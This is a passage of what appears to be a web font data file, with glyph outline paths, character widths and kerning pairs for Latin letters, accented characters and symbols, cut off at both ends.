,-52v-32,0,-52,21,-52,52xm311,-84r-135,0v-1,32,18,61,54,61v24,0,43,-13,50,-36r29,0v-11,71,-115,86,-147,27v-12,27,-36,36,-64,36v-59,0,-85,-44,-85,-97v0,-54,27,-97,85,-97v29,0,51,6,64,32v13,-22,40,-32,66,-32v62,0,86,47,83,106","w":320},{"d":"137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211xm14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135","w":273},{"d":"-21,-226r0,-20r123,0r0,20r-123,0","w":79},{"d":"243,-180r-34,0v-8,-36,-36,-54,-72,-54v-61,0,-87,50,-87,104v0,59,25,107,87,107v45,0,71,-32,74,-74r35,0v-7,64,-47,103,-112,103v-80,0,-119,-59,-119,-134v0,-75,43,-135,122,-135v54,0,98,28,106,83xm190,-332r-37,52r-34,0r-37,-52r30,0r25,35r25,-35r28,0","w":259},{"d":"70,-113v25,0,56,26,77,26v15,0,22,-15,31,-28r13,18v-10,15,-23,31,-45,31v-29,1,-47,-27,-78,-26v-16,0,-24,15,-30,28r-13,-18v8,-15,21,-31,45,-31","w":216},{"d":"72,69r6,-16v12,7,42,8,44,-7v1,-12,-21,-13,-31,-8v-12,-12,5,-22,11,-33v-53,-5,-88,-34,-89,-90r33,0v0,43,36,62,75,62v31,0,65,-9,65,-46v0,-71,-165,-25,-165,-119v0,-52,46,-75,93,-75v53,0,93,24,95,81r-32,0v-4,-37,-28,-52,-64,-52v-29,0,-58,11,-58,44v0,63,165,18,165,119v-1,56,-54,78,-103,77v-3,5,-8,8,-10,14v18,-9,42,2,42,24v-2,36,-49,37,-77,25","w":233},{"d":"209,-182r-32,0v-4,-37,-28,-52,-64,-52v-29,0,-58,11,-58,44v0,63,165,18,165,119v0,55,-53,77,-100,77v-58,0,-107,-29,-107,-91r33,0v0,43,36,62,75,62v31,0,65,-9,65,-46v0,-71,-165,-25,-165,-119v0,-52,46,-75,93,-75v53,0,93,24,95,81xm63,-280r37,-52r34,0r37,52r-30,0r-25,-35r-25,35r-28,0","w":233},{"d":"56,-189v0,28,20,41,45,41v24,0,42,-15,42,-41v0,-26,-18,-39,-43,-39v-24,0,-44,13,-44,39xm23,-190v0,-42,36,-65,75,-65v89,0,100,89,42,118v31,10,46,32,46,64v0,49,-38,77,-85,77v-49,0,-87,-25,-87,-77v0,-30,16,-54,45,-64v-22,-9,-36,-30,-36,-53xm47,-72v0,31,22,49,54,49v31,0,52,-21,52,-49v0,-27,-23,-49,-52,-49v-30,0,-54,19,-54,49"},{"d":"22,0r0,-186r29,0r0,39v15,-30,36,-44,69,-43r0,32v-81,-5,-66,83,-67,158r-31,0xm17,50r0,-32r40,0v3,33,-2,61,-35,58r0,-13v15,-4,14,-9,14,-13r-19,0","w":119,"k":{",":33,"-":20,".":33,"q":6,"e":6,"\u00e8":6,"\u00e9":6,"\u00ea":6,"\u00eb":6,"\u0113":6,"\u0115":6,"\u0117":6,"\u0119":6,"\u011b":6,"o":6,"\u00f2":6,"\u00f3":6,"\u00f4":6,"\u00f5":6,"\u00f6":6,"\u014d":6,"\u014f":6,"\u0151":6,"c":6,"\u00e7":6,"\u0107":6,"\u0109":6,"\u010b":6,"\u010d":6,"d":6,"\u010f":6,"g":10,"\u011d":10,"\u011f":10,"\u0121":10,"\u0123":10,"n":-6,"\u00f1":-6,"\u0144":-6,"\u0146":-6,"\u0148":-6,"\u0149":-6}},{"d":"209,-182r-32,0v-4,-37,-28,-52,-64,-52v-29,0,-58,11,-58,44v0,63,165,18,165,119v0,55,-53,77,-100,77v-58,0,-107,-29,-107,-91r33,0v0,43,36,62,75,62v31,0,65,-9,65,-46v0,-71,-165,-25,-165,-119v0,-52,46,-75,93,-75v53,0,93,24,95,81xm101,-280r31,-52r39,0r-47,52r-23,0","w":233},{"d":"62,-228r0,199r57,0v23,0,87,-6,87,-101v0,-61,-23,-98,-86,-98r-58,0xm28,0r0,-257r88,0v79,0,124,40,124,122v0,86,-38,135,-124,135r-88,0","w":253},{"d":"36,-87r86,0r-1,-125xm151,-255r0,168r34,0r0,27r-34,0r0,60r-29,0r0,-60r-112,0r0,-29r116,-166r25,0"},{"d":"9,-78r31,0v1,32,21,50,50,55r0,-95v-51,-13,-73,-28,-73,-70v0,-44,32,-72,73,-75r0,-24r20,0r0,24v39,5,61,29,71,71r-31,0v-5,-24,-18,-37,-40,-41r0,88v36,9,79,17,79,73v0,46,-33,74,-79,78r0,30r-20,0r0,-30v-48,-5,-77,-34,-81,-84xm110,-113r0,90v27,-2,47,-15,47,-46v0,-27,-21,-36,-47,-44xm90,-150r0,-84v-23,3,-41,16,-41,43v0,25,17,34,41,41"},{"d":"98,42r0,-38v-53,-2,-81,-42,-81,-95v0,-52,27,-95,81,-99r0,-35r14,0r0,35v39,1,68,20,73,64r-31,0v-5,-22,-19,-36,-42,-37r0,140v26,-3,40,-21,44,-45r30,0v-4,36,-29,72,-74,72r0,38r-14,0xm98,-23r0,-140v-67,7,-67,134,0,140"},{"d":"45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70xm13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm53,-217r0,-37r33,0r0,37r-33,0xm121,-217r0,-37r32,0r0,37r-32,0","w":206},{"d":"70,-186r0,40r-40,0r0,-40r40,0xm30,0r0,-40r40,0v2,47,0,82,-40,93r0,-18v16,-6,22,-23,21,-35r-21,0","w":100},{"d":"23,0r0,-186r29,0v1,9,-2,22,1,29v13,-23,33,-33,60,-33v94,-2,56,109,64,190r-30,0r0,-126v0,-23,-15,-37,-38,-37v-76,-1,-51,94,-55,163r-31,0xm126,-218v-25,0,-58,-31,-69,1r-18,0v5,-22,15,-40,38,-40v26,0,56,33,66,-1r19,0v-3,18,-14,40,-36,40"},{"d":"18,-86r0,-28r104,0r0,28r-104,0","w":140},{"d":"45,-111r107,0v-2,-29,-22,-52,-53,-52v-32,0,-52,23,-54,52xm152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v26,0,44,-12,49,-36","w":193},{"d":"138,14v-7,-54,-125,-59,-125,-131v0,-22,17,-44,38,-50v-38,-37,0,-96,50,-96v39,0,65,21,66,66r-30,0v0,-22,-14,-39,-37,-39v-19,0,-34,10,-34,31v0,50,120,57,120,123v0,24,-16,43,-38,52v44,32,16,101,-46,101v-43,0,-69,-26,-72,-68r30,0v-5,45,75,58,78,11xm68,-151v-14,5,-26,18,-26,33v0,43,61,48,88,73v14,-6,26,-17,26,-33v0,-42,-60,-50,-88,-73"},{"d":"243,-180r-34,0v-8,-36,-36,-54,-72,-54v-61,0,-87,50,-87,104v0,59,25,107,87,107v45,0,71,-32,74,-74r35,0v-7,64,-47,103,-112,103v-80,0,-119,-59,-119,-134v0,-75,43,-135,122,-135v54,0,98,28,106,83xm85,-280r37,-52r34,0r37,52r-30,0r-25,-35r-25,35r-28,0","w":259},{"d":"94,-159r55,43r0,32r-55,43r0,-31r36,-28r-36,-28r0,-31xm23,-159r55,43r0,32r-55,43r0,-31r36,-28r-36,-28r0,-31","w":166},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0xm115,-212r29,-52r38,0r-43,52r-24,0xm59,-212r29,-52r38,0r-44,52r-23,0"},{"d":"111,-263r0,21v-51,-11,-35,54,-35,97v0,34,-24,45,-31,50v8,1,31,12,31,48v0,38,-21,105,35,97r0,21v-39,3,-64,-5,-64,-47v0,-42,6,-108,-30,-108r0,-24v36,0,30,-66,30,-108v0,-42,25,-50,64,-47","w":119},{"d":"55,0r-30,0r0,-186r30,0r0,186xm33,-212r-47,-52r39,0r31,52r-23,0","w":79},{"d":"193,-103r23,0v-18,95,-154,59,-147,-26v-11,-88,134,-115,146,-27r-22,0v-19,-62,-100,-34,-100,27v0,33,21,63,56,63v24,0,41,-15,44,-37xm33,-129v0,66,48,115,111,115v62,0,111,-49,111,-115v0,-64,-49,-114,-111,-114v-63,0,-111,50,-111,114xm9,-129v0,-76,61,-134,135,-134v73,0,135,58,135,134v0,77,-62,135,-135,135v-74,0,-135,-58,-135,-135","w":288},{"d":"243,-180r-34,0v-8,-36,-36,-54,-72,-54v-61,0,-87,50,-87,104v0,59,25,107,87,107v45,0,71,-32,74,-74r35,0v-7,63,-46,102,-109,103v-3,5,-8,8,-10,14v18,-9,44,2,43,24v-2,36,-50,37,-78,25r6,-16v12,7,43,8,45,-7v1,-12,-22,-13,-32,-8v-12,-12,5,-22,11,-33v-72,-6,-107,-62,-107,-133v0,-75,43,-135,122,-135v54,0,98,28,106,83","w":259},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0xm126,-218v-25,0,-58,-31,-69,1r-18,0v5,-22,15,-40,38,-40v26,0,56,33,66,-1r19,0v-3,18,-14,40,-36,40"},{"d":"177,-186r-81,211v-17,44,-35,58,-75,46r0,-28v17,8,36,6,43,-12r13,-32r-74,-185r34,0r56,152r52,-152r32,0xm38,-212r37,-52r34,0r37,52r-30,0r-25,-35r-25,35r-28,0","w":180,"k":{",":27,".":27}},{"d":"184,-186r0,170v0,61,-28,92,-87,92v-35,0,-75,-15,-77,-55r31,0v1,22,28,30,48,30v44,1,61,-37,55,-83v-10,23,-34,34,-58,34v-55,0,-83,-43,-83,-94v0,-44,21,-98,86,-98v24,-1,43,12,56,31r0,-27r29,0xm98,-25v72,0,77,-137,2,-138v-39,0,-55,31,-55,67v0,33,13,71,53,71","w":206},{"d":"243,-180r-34,0v-8,-36,-36,-54,-72,-54v-61,0,-87,50,-87,104v0,59,25,107,87,107v45,0,71,-32,74,-74r35,0v-7,64,-47,103,-112,103v-80,0,-119,-59,-119,-134v0,-75,43,-135,122,-135v54,0,98,28,106,83","w":259},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0xm40,-226r0,-20r123,0r0,20r-123,0"},{"d":"23,0r0,-186r29,0v1,9,-2,22,1,29v13,-23,33,-33,60,-33v94,-2,56,109,64,190r-30,0r0,-126v0,-23,-15,-37,-38,-37v-76,-1,-51,94,-55,163r-31,0xm87,-212r31,-52r39,0r-47,52r-23,0"},{"d":"9,71r0,-21v51,11,35,-54,35,-97v0,-34,24,-44,31,-49v-8,-1,-31,-13,-31,-49v0,-38,21,-106,-35,-97r0,-21v39,-3,64,5,64,47v0,42,-7,109,30,108r0,24v-35,0,-30,66,-30,108v0,42,-25,50,-64,47","w":119},{"d":"177,-186r-81,211v-17,44,-35,58,-75,46r0,-28v17,8,36,6,43,-12r13,-32r-74,-185r34,0r56,152r52,-152r32,0xm42,-217r0,-37r33,0r0,37r-33,0xm110,-217r0,-37r33,0r0,37r-33,0","w":180,"k":{",":27,".":27}},{"d":"249,-263r11,11r-29,32v61,81,25,228,-94,226v-35,0,-63,-12,-83,-31r-29,32r-12,-11r31,-33v-62,-79,-27,-229,93,-226v36,0,63,12,83,32xm208,-195r-132,147v14,16,34,25,61,25v89,-1,109,-107,71,-172xm66,-61r133,-147v-14,-16,-35,-26,-62,-26v-89,0,-109,108,-71,173","w":273},{"d":"9,0v-3,-104,134,-102,136,-182v0,-28,-22,-46,-49,-46v-36,0,-51,32,-50,63r-30,0v-3,-52,28,-90,82,-90v44,0,80,25,80,73v0,87,-118,90,-134,155r131,0r0,27r-166,0"},{"d":"45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70xm13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm129,-218v-24,0,-58,-31,-68,1r-19,0v5,-22,15,-40,38,-40v26,1,56,33,67,-1r19,0v-3,19,-15,40,-37,40","w":206},{"d":"25,0r0,-257r30,0r0,257r-30,0","w":79},{"d":"86,0r0,-228r-85,0r0,-29r205,0r0,29r-85,0r0,228r-35,0xm157,-332r-37,52r-34,0r-37,-52r30,0r25,35r25,-35r28,0","w":206,"k":{":":40,",":40,"-":46,".":40,";":40,"A":33,"\u00c0":33,"\u00c1":33,"\u00c2":33,"\u00c3":33,"\u00c4":33,"\u0100":33,"\u0102":33,"\u0104":33,"a":40,"\u00e0":40,"\u00e1":40,"\u00e2":40,"\u00e3":40,"\u00e5":40,"\u0101":40,"\u0103":40,"\u0105":40,"e":40,"\u00e8":40,"\u00e9":40,"\u00ea":40,"\u00eb":40,"\u0113":40,"\u0115":40,"\u0117":40,"\u0119":40,"\u011b":40,"o":40,"\u00f2":40,"\u00f3":40,"\u00f4":40,"\u00f5":40,"\u00f6":40,"\u014d":40,"\u014f":40,"\u0151":40,"u":33,"\u00f9":33,"\u00fa":33,"\u00fb":33,"\u00fc":33,"\u0169":33,"\u016b":33,"\u016d":33,"\u016f":33,"\u0171":33,"\u0173":33,"w":40,"\u0175":40,"y":40,"\u00fd":40,"\u00ff":40,"\u0177":40,"c":40,"\u00e7":40,"\u0107":40,"\u0109":40,"\u010b":40,"\u010d":40,"r":33,"\u0155":33,"\u0157":33,"\u0159":33,"s":40,"\u015b":40,"\u015d":40,"\u015f":40,"\u0161":40,"\u0219":40}},{"d":"117,-226v-17,38,-29,81,-45,120r87,0xm-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0xm67,-285r0,-38r32,0r0,38r-32,0xm134,-285r0,-38r33,0r0,38r-33,0","w":233,"k":{"v":6,"V":17,"\u2019":27,"T":33,"\u0162":33,"\u0164":33,"\u021a":33,"W":9,"\u0174":9,"Y":27,"\u00dd":27,"\u0176":27,"\u0178":27,"w":6,"\u0175":6,"y":6,"\u00fd":6,"\u00ff":6,"\u0177":6}},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0xm50,-217r0,-37r32,0r0,37r-32,0xm117,-217r0,-37r33,0r0,37r-33,0"},{"d":"76,-310v0,-22,19,-40,41,-40v22,0,40,18,40,40v0,22,-18,40,-40,40v-22,0,-41,-18,-41,-40xm93,-310v0,14,10,25,24,25v14,0,24,-11,24,-25v0,-14,-10,-24,-24,-24v-14,0,-24,10,-24,24xm117,-226v-17,38,-29,81,-45,120r87,0xm-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0","w":233},{"d":"8,0r0,-29r160,-199r-148,0r0,-29r188,0r0,29r-159,199r163,0r0,29r-204,0","w":219},{"w":100},{"d":"28,0r0,-257r34,0r0,228r136,0r0,29r-170,0xm87,50r0,-32r40,0v3,33,-2,61,-35,58r0,-13v15,-4,14,-9,14,-13r-19,0","k":{"V":33,"\u2019":27,"T":33,"\u0162":33,"\u0164":33,"\u021a":33,"W":20,"\u0174":20,"Y":40,"\u00dd":40,"\u0176":40,"\u0178":40,"y":13,"\u00fd":13,"\u00ff":13,"\u0177":13}},{"d":"229,0r-9,-32v-20,27,-52,38,-82,38v-77,0,-123,-62,-123,-129v0,-75,42,-140,123,-140v56,0,101,25,110,85r-34,0v-7,-39,-37,-56,-76,-56v-62,0,-88,54,-88,109v0,54,31,102,88,102v53,0,84,-37,82,-84r-82,0r0,-28r113,0r0,135r-22,0xm116,50r0,-32r40,0v3,34,-3,60,-36,58r0,-13v15,-4,14,-9,14,-13r-18,0","w":273},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0xm63,-280r37,-52r34,0r37,52r-30,0r-25,-35r-25,35r-28,0","w":219},{"d":"48,-126v0,38,0,103,52,103v52,0,53,-65,53,-103v0,-38,-1,-102,-53,-102v-52,0,-52,64,-52,102xm15,-125v0,-56,5,-130,85,-130v80,0,85,74,85,130v0,56,-5,129,-85,129v-80,0,-85,-73,-85,-129"},{"d":"30,0r0,-257r34,0r0,257r-34,0xm-3,-285r0,-38r32,0r0,38r-32,0xm64,-285r0,-38r33,0r0,38r-33,0","w":93},{"d":"64,-204r0,40r-40,0v-1,-44,-2,-92,39,-93r0,18v-16,0,-21,18,-21,35r22,0xm130,-204r0,40r-40,0v-1,-44,-2,-92,39,-93r0,18v-16,0,-21,18,-21,35r22,0","w":153},{"d":"159,-257r0,193v0,35,-18,70,-76,70v-54,0,-79,-32,-75,-91r34,0v-1,36,5,62,42,62v31,0,41,-18,41,-46r0,-188r34,0xm87,-280r37,-52r33,0r38,52r-30,0r-25,-35r-26,35r-27,0","w":186},{"d":"267,-186r-60,186r-32,0r-39,-148r-37,148r-33,0r-60,-186r34,0r43,152r37,-152r34,0r39,152r42,-152r32,0","w":272,"k":{",":20,".":20}},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,46,25,70,71,70v102,0,58,-144,67,-234r34,0xm156,-287v-25,-1,-58,-31,-69,2r-18,0v5,-22,15,-40,38,-40v26,0,57,32,67,-2r18,0v-2,19,-13,41,-36,40","w":259},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,46,25,70,71,70v102,0,58,-144,67,-234r34,0xm124,-280r-47,-52r39,0r31,52r-23,0","w":259},{"d":"137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211xm14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135xm117,-280r31,-52r39,0r-47,52r-23,0","w":273},{"d":"8,0r0,-23r112,-136r-105,0r0,-27r145,0r0,21r-114,138r119,0r0,27r-157,0","w":172},{"d":"117,-226v-17,38,-29,81,-45,120r87,0xm-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0xm111,-280r-47,-52r39,0r31,52r-23,0","w":233,"k":{"v":6,"V":17,"\u2019":27,"T":33,"\u0162":33,"\u0164":33,"\u021a":33,"W":9,"\u0174":9,"Y":27,"\u00dd":27,"\u0176":27,"\u0178":27,"w":6,"\u0175":6,"y":6,"\u00fd":6,"\u00ff":6,"\u0177":6}},{"d":"60,-183v0,21,3,52,30,52v27,0,32,-30,32,-52v0,-21,-4,-52,-31,-52v-27,0,-31,30,-31,52xm33,-182v0,-39,14,-73,58,-73v45,0,58,33,58,72v0,37,-16,72,-58,72v-43,0,-58,-32,-58,-71xm238,-68v0,21,3,53,30,53v27,0,32,-31,32,-53v0,-21,-4,-52,-31,-52v-27,0,-31,30,-31,52xm211,-67v0,-39,14,-73,58,-73v45,0,58,33,58,72v0,37,-16,72,-58,72v-43,0,-58,-32,-58,-71xm68,8r193,-268r31,0r-193,268r-31,0","w":360},{"d":"120,-182r0,79r79,0r0,24r-79,0r0,79r-24,0r0,-79r-79,0r0,-24r79,0r0,-79r24,0","w":216},{"d":"0,71r0,-24r39,0r0,-286r-39,0r0,-24r67,0r0,334r-67,0","w":93},{"d":"199,-185r0,24r-153,70r153,69r0,25r-182,-83r0,-22","w":216},{"d":"48,-140v10,47,121,18,121,86v0,45,-41,58,-79,58v-42,0,-77,-17,-79,-63r31,0v1,27,25,36,50,36v19,0,45,-4,45,-27v0,-48,-122,-16,-122,-88v0,-37,37,-52,70,-52v42,0,73,13,76,58r-31,0v-2,-24,-23,-31,-43,-31v-18,0,-39,4,-39,23xm71,50r0,-32r40,0v3,34,-3,60,-36,58r0,-13v15,-4,14,-9,14,-13r-18,0","w":180},{"d":"8,0r0,-23r112,-136r-105,0r0,-27r145,0r0,21r-114,138r119,0r0,27r-157,0xm74,-212r31,-52r39,0r-47,52r-23,0","w":172},{"d":"102,-155v-37,0,-57,25,-57,62v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-33,-17,-62,-59,-62xm13,-93v0,-68,83,-119,136,-69v-12,-24,-32,-46,-44,-54r-42,19r-13,-14r39,-19v-8,-7,-18,-13,-25,-17r25,-16v7,5,18,12,28,20r43,-20r12,13r-41,19v43,36,63,83,63,138v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97","w":206},{"d":"121,-186r0,40r-40,0r0,-40r40,0xm24,4v0,-62,67,-63,63,-126r30,0v6,72,-63,72,-60,128v2,26,17,43,43,43v35,0,50,-27,50,-60r31,0v1,49,-31,87,-81,87v-45,0,-76,-26,-76,-72"},{"d":"62,-228r0,81v51,-1,126,10,123,-41v-4,-60,-72,-34,-123,-40xm28,-257v83,3,192,-21,192,63v0,27,-15,48,-39,58v78,18,59,136,-29,136r-124,0r0,-257xm62,-118r0,89v57,-2,137,15,134,-46v-2,-60,-78,-39,-134,-43","w":246},{"d":"30,0r0,-257r34,0r0,257r-34,0","w":93},{"d":"137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211xm14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135xm130,-280r-47,-52r39,0r31,52r-23,0","w":273},{"d":"90,-164r0,-93r24,0r0,93r-24,0xm39,-164r0,-93r25,0r0,93r-25,0","w":153},{"d":"22,0r0,-186r29,0r0,39v15,-30,36,-44,69,-43r0,32v-81,-5,-66,83,-67,158r-31,0","w":119,"k":{",":33,"-":20,".":33,"q":6,"e":6,"\u00e8":6,"\u00e9":6,"\u00ea":6,"\u00eb":6,"\u0113":6,"\u0115":6,"\u0117":6,"\u0119":6,"\u011b":6,"o":6,"\u00f2":6,"\u00f3":6,"\u00f4":6,"\u00f5":6,"\u00f6":6,"\u014d":6,"\u014f":6,"\u0151":6,"c":6,"\u00e7":6,"\u0107":6,"\u0109":6,"\u010b":6,"\u010d":6,"d":6,"\u010f":6,"g":10,"\u011d":10,"\u011f":10,"\u0121":10,"\u0123":10,"n":-6,"\u00f1":-6,"\u0144":-6,"\u0146":-6,"\u0148":-6,"\u0149":-6}},{"d":"221,-257r-92,257r-39,0r-90,-257r37,0r74,223r74,-223r36,0","w":219,"k":{";":17,":":17,".":46,"-":20,",":46,"A":17,"\u00c0":17,"\u00c1":17,"\u00c2":17,"\u00c3":17,"\u00c4":17,"\u0100":17,"\u0102":17,"\u0104":17,"a":20,"\u00e0":20,"\u00e1":20,"\u00e2":20,"\u00e3":20,"\u00e5":20,"\u0101":20,"\u0103":20,"\u0105":20,"e":20,"\u00e8":20,"\u00e9":20,"\u00ea":20,"\u00eb":20,"\u0113":20,"\u0115":20,"\u0117":20,"\u0119":20,"\u011b":20,"i":6,"\u012f":6,"\u0133":6,"o":20,"\u00f2":20,"\u00f3":20,"\u00f4":20,"\u00f5":20,"\u00f6":20,"\u014d":20,"\u014f":20,"\u0151":20,"r":13,"\u0155":13,"\u0157":13,"\u0159":13,"u":13,"\u00f9":13,"\u00fa":13,"\u00fb":13,"\u00fc":13,"\u0169":13,"\u016b":13,"\u016d":13,"\u016f":13,"\u0171":13,"\u0173":13,"y":6,"\u00fd":6,"\u00ff":6,"\u0177":6}},{"d":"229,0r-9,-32v-20,27,-52,38,-82,38v-77,0,-123,-62,-123,-129v0,-75,42,-140,123,-140v56,0,101,25,110,85r-34,0v-7,-39,-37,-56,-76,-56v-62,0,-88,54,-88,109v0,54,31,102,88,102v53,0,84,-37,82,-84r-82,0r0,-28r113,0r0,135r-22,0xm154,-323r0,37r-32,0r0,-37r32,0","w":273},{"d":"175,-186r-68,186r-33,0r-69,-186r34,0r53,155r51,-155r32,0","w":180,"k":{".":27,",":27}},{"d":"93,-263r0,24r-38,0r0,286r38,0r0,24r-67,0r0,-334r67,0","w":93},{"d":"178,0v-4,-62,86,-62,87,-109v0,-15,-13,-26,-30,-26v-22,0,-30,17,-30,36r-24,0v0,-33,22,-55,55,-55v29,0,53,16,53,45v1,49,-76,57,-87,89r85,0r0,20r-109,0xm79,-255r0,154r-25,0r0,-111r-41,0r0,-18v23,0,43,-5,48,-25r18,0xm49,10r156,-271r23,0r-156,271r-23,0","w":300},{"d":"184,-186r0,170v0,61,-28,92,-87,92v-35,0,-75,-15,-77,-55r31,0v1,22,28,30,48,30v44,1,61,-37,55,-83v-10,23,-34,34,-58,34v-55,0,-83,-43,-83,-94v0,-44,21,-98,86,-98v24,-1,43,12,56,31r0,-27r29,0xm98,-25v72,0,77,-137,2,-138v-39,0,-55,31,-55,67v0,33,13,71,53,71xm123,-257r0,32r-40,0v-3,-33,2,-61,35,-58r0,13v-15,4,-14,9,-14,13r19,0","w":206},{"d":"28,0r0,-257r36,0r136,208r0,-208r33,0r0,257r-38,0r-135,-206r0,206r-32,0","w":259},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0xm57,-294r0,-20r123,0r0,20r-123,0","w":219},{"d":"99,-158v15,-10,34,-23,34,-45v0,-15,-11,-27,-29,-27v-14,0,-30,8,-30,27v0,15,14,31,25,45xm192,0r-27,-32v-15,24,-45,36,-73,36v-69,0,-80,-49,-80,-70v0,-40,27,-61,60,-78v-38,-35,-41,-111,30,-113v32,0,62,18,62,53v0,31,-23,52,-48,66r46,57v5,-13,7,-26,8,-40r29,0v-3,31,-6,40,-17,63r50,58r-40,0xm148,-53r-59,-71v-24,13,-45,28,-45,58v0,54,83,55,104,13","w":226},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0xm92,-212r-47,-52r39,0r31,52r-23,0"},{"d":"101,-189v-34,0,-60,27,-60,63v0,35,27,63,60,63v33,0,58,-28,58,-63v0,-33,-25,-63,-58,-63xm9,-200r18,-17r20,20v27,-25,79,-25,106,-1r20,-20r18,19r-20,19v26,27,25,80,0,108r20,20r-17,17r-20,-21v-28,27,-81,26,-108,0r-20,21r-17,-17r20,-21v-25,-27,-26,-80,1,-106"},{"d":"73,-41r-55,-43r0,-32r55,-43r0,31r-36,28r36,28r0,31xm143,-41r-54,-43r0,-32r54,-43r0,31r-36,28r36,28r0,31","w":166},{"d":"55,-257r0,37r-30,0r0,-37r30,0xm55,-186r0,210v0,39,-24,51,-60,46r0,-26v21,1,30,1,30,-25r0,-205r30,0","w":79},{"d":"28,0r0,-257r34,0r0,128r131,-128r44,0r-108,104r112,153r-43,0r-93,-130r-43,40r0,90r-34,0xm103,50r0,-32r40,0v3,34,-3,60,-36,58r0,-13v15,-4,15,-9,15,-13r-19,0","w":240},{"d":"66,-242r0,56r37,0r0,27r-37,0r0,115v-4,19,18,17,37,17r0,27v-40,0,-68,3,-68,-41r0,-118r-32,0r0,-27r32,0r0,-56r31,0","w":113},{"d":"18,-212r31,-52r39,0r-47,52r-23,0","w":79},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,46,25,70,71,70v102,0,58,-144,67,-234r34,0xm77,-280r37,-52r34,0r37,52r-30,0r-25,-35r-25,35r-28,0","w":259},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0xm102,-280r31,-52r39,0r-47,52r-23,0","w":219},{"d":"67,-186r0,40r-40,0r0,-40r40,0xm30,71v-2,-68,4,-130,9,-191r16,0r9,112r0,79r-34,0","w":93},{"d":"23,0r0,-186r29,0v1,9,-2,22,1,29v13,-23,33,-33,60,-33v94,-2,56,109,64,190r-30,0r0,-126v0,-23,-15,-37,-38,-37v-76,-1,-51,94,-55,163r-31,0xm80,50r0,-32r40,0v3,34,-3,60,-36,58r0,-13v15,-4,14,-9,14,-13r-18,0"},{"d":"93,-197v-15,11,-59,3,-60,27v6,31,68,8,60,-10r0,-17xm9,-169v-9,-45,84,-28,85,-51v0,-16,-14,-17,-28,-17v-17,0,-29,5,-30,20r-22,0v1,-28,26,-38,53,-38v22,0,47,5,47,31r0,58v-1,14,5,12,13,10r0,16v-13,6,-34,4,-34,-13v-19,24,-85,23,-84,-16","w":136},{"d":"184,-186r0,170v0,61,-28,92,-87,92v-35,0,-75,-15,-77,-55r31,0v1,22,28,30,48,30v44,1,61,-37,55,-83v-10,23,-34,34,-58,34v-55,0,-83,-43,-83,-94v0,-44,21,-98,86,-98v24,-1,43,12,56,31r0,-27r29,0xm98,-25v72,0,77,-137,2,-138v-39,0,-55,31,-55,67v0,33,13,71,53,71xm47,-262r18,0v6,20,19,29,40,29v21,0,29,-11,36,-29r18,0v-5,31,-25,49,-57,49v-33,0,-50,-17,-55,-49","w":206},{"d":"30,0r0,-40r40,0v2,47,0,82,-40,93r0,-18v16,-6,22,-23,21,-35r-21,0","w":100},{"d":"62,-228r0,81r77,0r0,25r-77,0r0,93r57,0v23,0,87,-6,87,-101v0,-61,-23,-98,-86,-98r-58,0xm28,0r0,-122r-25,0r0,-25r25,0r0,-110r88,0v79,0,124,40,124,122v0,86,-38,135,-124,135r-88,0","w":253},{"d":"85,-17v0,-13,10,-23,23,-23v13,0,23,10,23,23v0,12,-11,23,-23,23v-13,0,-23,-10,-23,-23xm85,-165v0,-13,10,-23,23,-23v13,0,23,10,23,23v0,12,-11,23,-23,23v-13,0,-23,-10,-23,-23xm17,-79r0,-24r182,0r0,24r-182,0","w":216},{"d":"188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v33,-7,63,-4,63,-27v0,